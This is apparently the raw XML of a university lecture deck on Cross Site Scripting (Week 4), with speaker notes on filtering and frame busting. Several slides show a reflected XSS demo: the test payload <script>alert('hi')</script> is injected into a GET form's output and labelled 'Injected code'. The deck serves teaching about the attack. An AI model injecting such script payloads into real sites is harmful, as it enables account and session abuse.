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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId89"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId90"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="709" r:id="rId3"/>
    <p:sldId id="627" r:id="rId4"/>
    <p:sldId id="628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6" r:id="rId13"/>
    <p:sldId id="638" r:id="rId14"/>
    <p:sldId id="642" r:id="rId15"/>
    <p:sldId id="639" r:id="rId16"/>
    <p:sldId id="640" r:id="rId17"/>
    <p:sldId id="641" r:id="rId18"/>
    <p:sldId id="654" r:id="rId19"/>
    <p:sldId id="480" r:id="rId20"/>
    <p:sldId id="644" r:id="rId21"/>
    <p:sldId id="643" r:id="rId22"/>
    <p:sldId id="645" r:id="rId23"/>
    <p:sldId id="646" r:id="rId24"/>
    <p:sldId id="647" r:id="rId25"/>
    <p:sldId id="648" r:id="rId26"/>
    <p:sldId id="649" r:id="rId27"/>
    <p:sldId id="650" r:id="rId28"/>
    <p:sldId id="651" r:id="rId29"/>
    <p:sldId id="652" r:id="rId30"/>
    <p:sldId id="653" r:id="rId31"/>
    <p:sldId id="708" r:id="rId32"/>
    <p:sldId id="655" r:id="rId33"/>
    <p:sldId id="656" r:id="rId34"/>
    <p:sldId id="657" r:id="rId35"/>
    <p:sldId id="658" r:id="rId36"/>
    <p:sldId id="659" r:id="rId37"/>
    <p:sldId id="707" r:id="rId38"/>
    <p:sldId id="661" r:id="rId39"/>
    <p:sldId id="662" r:id="rId40"/>
    <p:sldId id="663" r:id="rId41"/>
    <p:sldId id="664" r:id="rId42"/>
    <p:sldId id="665" r:id="rId43"/>
    <p:sldId id="666" r:id="rId44"/>
    <p:sldId id="667" r:id="rId45"/>
    <p:sldId id="668" r:id="rId46"/>
    <p:sldId id="669" r:id="rId47"/>
    <p:sldId id="670" r:id="rId48"/>
    <p:sldId id="699" r:id="rId49"/>
    <p:sldId id="671" r:id="rId50"/>
    <p:sldId id="673" r:id="rId51"/>
    <p:sldId id="674" r:id="rId52"/>
    <p:sldId id="675" r:id="rId53"/>
    <p:sldId id="676" r:id="rId54"/>
    <p:sldId id="677" r:id="rId55"/>
    <p:sldId id="678" r:id="rId56"/>
    <p:sldId id="679" r:id="rId57"/>
    <p:sldId id="680" r:id="rId58"/>
    <p:sldId id="681" r:id="rId59"/>
    <p:sldId id="682" r:id="rId60"/>
    <p:sldId id="683" r:id="rId61"/>
    <p:sldId id="684" r:id="rId62"/>
    <p:sldId id="685" r:id="rId63"/>
    <p:sldId id="686" r:id="rId64"/>
    <p:sldId id="687" r:id="rId65"/>
    <p:sldId id="688" r:id="rId66"/>
    <p:sldId id="689" r:id="rId67"/>
    <p:sldId id="706" r:id="rId68"/>
    <p:sldId id="690" r:id="rId69"/>
    <p:sldId id="691" r:id="rId70"/>
    <p:sldId id="692" r:id="rId71"/>
    <p:sldId id="693" r:id="rId72"/>
    <p:sldId id="694" r:id="rId73"/>
    <p:sldId id="695" r:id="rId74"/>
    <p:sldId id="696" r:id="rId75"/>
    <p:sldId id="697" r:id="rId76"/>
    <p:sldId id="698" r:id="rId77"/>
    <p:sldId id="705" r:id="rId78"/>
    <p:sldId id="589" r:id="rId79"/>
    <p:sldId id="590" r:id="rId80"/>
    <p:sldId id="591" r:id="rId81"/>
    <p:sldId id="592" r:id="rId82"/>
    <p:sldId id="593" r:id="rId83"/>
    <p:sldId id="594" r:id="rId84"/>
    <p:sldId id="595" r:id="rId85"/>
    <p:sldId id="704" r:id="rId86"/>
    <p:sldId id="626" r:id="rId87"/>
    <p:sldId id="470" r:id="rId8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SimSun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FA37540-817B-48D0-B402-8F2886C2FE07}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="无标题节" id="{A8E02071-B90D-4F17-8CE3-EDC716F08D65}">
          <p14:sldIdLst>
            <p14:sldId id="709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8"/>
            <p14:sldId id="642"/>
            <p14:sldId id="639"/>
            <p14:sldId id="640"/>
            <p14:sldId id="641"/>
            <p14:sldId id="654"/>
            <p14:sldId id="480"/>
            <p14:sldId id="644"/>
            <p14:sldId id="643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708"/>
            <p14:sldId id="655"/>
            <p14:sldId id="656"/>
            <p14:sldId id="657"/>
            <p14:sldId id="658"/>
            <p14:sldId id="659"/>
            <p14:sldId id="707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99"/>
            <p14:sldId id="671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706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705"/>
            <p14:sldId id="589"/>
            <p14:sldId id="590"/>
            <p14:sldId id="591"/>
            <p14:sldId id="592"/>
            <p14:sldId id="593"/>
            <p14:sldId id="594"/>
            <p14:sldId id="595"/>
            <p14:sldId id="704"/>
            <p14:sldId id="626"/>
            <p14:sldId id="4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9900"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="99CC00"/>
    <a:srgbClr val="CC0000"/>
    <a:srgbClr val="6600CC"/>
    <a:srgbClr val="254C9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0705" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="444" y="78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2" tIns="46835" rIns="93672" bIns="46835" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="936625">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" alt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2" tIns="46835" rIns="93672" bIns="46835" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="936625">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US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2" tIns="46835" rIns="93672" bIns="46835" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="936625">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US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3438"/>
            <a:ext cx="307657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2" tIns="46835" rIns="93672" bIns="46835" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="936625">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1FB2E4B0-0A69-4F92-9CA8-05F4671D33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678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0" tIns="49512" rIns="99020" bIns="49512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0" tIns="49512" rIns="99020" bIns="49512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0" tIns="49512" rIns="99020" bIns="49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0" tIns="49512" rIns="99020" bIns="49512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endParaRPr lang="en-US" alt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0" tIns="49512" rIns="99020" bIns="49512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fld id="{8BDEFA3D-CEA9-4FD1-B61C-39FEE91659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621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eerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings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eerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings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echonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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chonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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echonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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echonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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derconsideration.com/brandnew/archives/facebooks_radically_new_f_logo.ph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derconsideration.com/brandnew/archives/facebooks_radically_new_f_logo.ph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EFA3D-CEA9-4FD1-B61C-39FEE91659C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410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4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&lt;a href="http://thenounproject.com/noun/shock/#icon-No6840" target="_blank"&gt;Shock&lt;/a&gt; designed by &lt;a href="http://thenounproject.com/jimlears" target="_blank"&gt;Jim Lears&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438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BCE8DE-92B9-4B21-B210-144038F5AF0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85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4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Recent, from 2012</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441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60F5FE-C1D3-4A33-9092-2BAF1F5B56B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4971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4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&lt;a href="http://thenounproject.com/noun/cursor/#icon-No3065" target="_blank"&gt;Cursor&lt;/a&gt; designed by &lt;a href="http://thenounproject.com/fernando.yellow" target="_blank"&gt;Fernando Vasconcelos&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1456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E9826D-1F57-432A-9A92-16A68548799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2537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4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59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702A5C-BC74-4DEE-9464-28B955E2DA0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0101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4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http://beerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings/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62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A7773D-E252-423E-919A-588BE98734C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1668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4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http://beerpla.net/2009/10/29/modern-day-frame-busting-with-x-frame-options-and-this-content-cannot-be-displayed-in-a-frame-warnings/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65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58DB68-6478-4B79-A443-263B3C7544A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8389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4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http://techonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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68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7ADE9F-853D-4104-9B3D-FC6BD29307F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4869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4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http://techonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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71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37D7FC-AACB-419B-89C7-FF60A04415A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9597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4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http://techonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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74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AC8AC7-C027-4943-86FC-B869F8A245A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108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4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http://techonomy.com/wp-content/uploads/2013/06/paypal_logo.jpg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77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C79466-024A-4E4C-8F32-79401B4CCA0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2549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1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1371E9-F923-4FF6-9380-7ACB08D7109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5186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4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http://www.underconsideration.com/brandnew/archives/facebooks_radically_new_f_logo.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>p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80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7B693F-9226-43DC-AB45-EEE9030FD2D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1834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4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http://www.underconsideration.com/brandnew/archives/facebooks_radically_new_f_logo.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>p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83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993C51-7E4E-4979-A5F6-3012F6FB9F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0086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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>78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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2393801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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>79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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3588654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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>80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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2323235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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>81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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1427218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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>82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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35386101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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>83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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34980960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AF573-7430-4512-9472-4E2C5F594BF9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>84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Why good?  Because it lets you filter what comes in and what goes out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Why bad?  If that point goes down, you are cut off from everyone else.  Also, may have lots of congestion at that one point.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2010780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4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1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C021B6-1FA0-4134-BEC4-6705FABABEC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853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4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17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6E0BB7-6517-48E6-B5B5-C32A3BB19BF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4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4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20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D3EDD8-E513-438D-AC8C-FAB971CD99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975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4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23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6DF927-EAB1-49B1-A35A-090D21A28BE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493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4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26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A8C242-839E-4039-835E-963F9290F8E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995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4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29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BCDEF2-F697-43A9-BEA2-17CD67F9068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8112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4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This example taken from Web Application Hacker’s Handbook</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432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3CF6DD-6451-40ED-B374-E5D1AFDEED1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464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0514C2C2-2797-421A-9CB6-09D630F78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1556792"/>
            <a:ext cx="9144000" cy="15240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 sz="5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676400"/>
            <a:ext cx="9144000" cy="1143000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57290" y="4131410"/>
            <a:ext cx="6400800" cy="151216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rgbClr val="3333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2A7DF02-8FA9-47A0-A5FD-00A1477F9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" t="18688" r="59046" b="13542"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="0"/>
            <a:ext cx="1219200" cy="12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33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143000"/>
            <a:ext cx="8750300" cy="516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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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982017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1925" y="171450"/>
            <a:ext cx="1946275" cy="5924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3100" y="171450"/>
            <a:ext cx="5686425" cy="5924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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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1062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5" descr="校标.jp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73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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3929063" y="6357938"/>
            <a:ext cx="5214937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600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1B953B"/>
                </a:solidFill>
                <a:latin typeface="隶书" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>计算机科学与工程系</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1B953B"/>
              </a:solidFill>
              <a:latin typeface="隶书" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1B953B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Department of Computer Science and Engineering</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1B953B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57290" y="4114800"/>
            <a:ext cx="6400800" cy="152877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rgbClr val="169A4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833AC553-2E12-4F36-8D39-024ABB761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0"/>
            <a:ext cx="9144000" cy="18288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 sz="5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803E6939-31C4-4C72-BB05-A625CF137A6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1600200"/>
            <a:ext cx="9144000" cy="1828799"/>
          </a:xfr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4735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576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="169A48"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1196752"/>
            <a:ext cx="8568952" cy="5112568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+mj-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="2200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="2000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800">
                <a:latin typeface="+mj-lt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8676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697239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15-441 Networks Fall 2002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25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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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1816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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E0259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6614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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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8285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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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0238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15-441 Networks Fall 2002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04075" y="63563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00B102-BFC3-4C2C-9040-A696F1E025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864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379413"/>
            <a:ext cx="8785225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27" name="图片 35" descr="校标.jpg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556" y="65814"/>
            <a:ext cx="169299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8316913" y="6550025"/>
            <a:ext cx="7921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fld id="{907DAFB0-E094-4459-A3E2-094671EC551B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1B953B"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="r"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1B953B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/101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43000"/>
            <a:ext cx="8750300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286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华文中宋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wasp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22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w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Relationship Id="rId9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4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4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4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3.w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4.wmf"/><Relationship Id="rId9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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.wm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419eater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090607A-D79F-461C-93B1-41DF0829A824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>
                <a:latin typeface="Bernard MT Condensed" panose="02050806060905020404" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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021" y="3733800"/>
            <a:ext cx="9144000" cy="12954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+mj-lt"/>
              </a:rPr>
              <a:t>Week - 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" b="0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Picture 16" descr="Screen Shot 2012-07-02 at 4.08.21 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5308560" y="1523880"/>
            <a:ext cx="3250800" cy="1015560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662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Lacing JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133720" y="5448240"/>
            <a:ext cx="3809520" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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664" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1778040"/>
            <a:ext cx="4647960" cy="533160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332"/>
              <a:gd name="adj3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&lt;script&gt;alert(“hi”);&lt;/script&gt;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665" name="Picture 17" descr="Screen Shot 2012-07-02 at 4.05.29 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631880" y="2971800"/>
            <a:ext cx="6489360" cy="32508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50397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nip Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3579840"/>
            <a:ext cx="7314840" cy="2210760"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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solidFill>
              <a:srgbClr val="414242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onsolas"/>
              </a:rPr>
              <a:t>&lt;form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS" action="#" method="GET”&gt;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onsolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;What's your name?&lt;/p&gt;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onsolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="name"&gt;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onsolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="Submit"&gt;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onsolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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onsolas"/>
              </a:rPr>
              <a:t>&lt;pre&gt;&lt;script&gt;alert(“hi”)&lt;/script&gt;&lt;/pre&gt;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667" name="Picture 16" descr="Screen Shot 2012-07-02 at 4.08.21 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5308560" y="1523880"/>
            <a:ext cx="3250800" cy="1015560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668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Lacing JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Straight Arrow Connector 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4571280" y="2540160"/>
            <a:ext cx="2361960" cy="1039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headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow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0" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133720" y="5448240"/>
            <a:ext cx="3809520" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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671" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455080" y="5905440"/>
            <a:ext cx="3200040" cy="799920"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545"/>
              <a:gd name="adj3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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Injected code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672" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1778040"/>
            <a:ext cx="4647960" cy="533160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332"/>
              <a:gd name="adj3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&lt;script&gt;alert(“hi”);&lt;/script&gt;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47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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
